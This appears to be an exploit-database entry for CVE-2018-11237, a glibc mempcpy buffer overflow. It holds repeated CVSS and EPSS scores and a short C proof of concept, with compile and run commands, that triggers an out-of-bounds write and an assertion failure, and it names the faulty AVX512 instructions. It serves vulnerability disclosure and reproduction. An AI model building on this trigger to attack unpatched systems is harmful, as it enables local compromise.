7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
4.6 Medium
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:L/AC:L/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
21.1%
GNU glibc < 2.27 - Local Buffer Overflow. CVE-2018-11237. Local exploit for Linux platform
# Exploit Title: GNU glibc < 2.27 - Local Buffer Overflow
# Date: 2018-05-24
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage: http://www.gnu.org/ <http://www.gnu.org/>
# CVE: CVE-2018-11237
# POC:
$ cat mempcpy.c
#define _GNU_SOURCE 1
#include <string.h>
#include <assert.h>
#define N 97699
char a[N];
char b[N+128];
int
main (void)
{
memset (a, 'x', N);
char *c = mempcpy (b, a, N);
assert (*c == 0);
}
$ gcc -g mempcpy.c -o mempcpy -fno-builtin-mempcpy
$ ./mempcpy
mempcpy: mempcpy.c:14: main: Assertion `*c == 0' failed.
The problem is these two lines in memmove-avx512-no-vzeroupper.S:
vmovups %zmm4, (%rax)
vmovups %zmm5, 0x40(%rax)
For mempcpy, %rax points to the end of the buffer.
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
4.6 Medium
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:L/AC:L/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
21.1%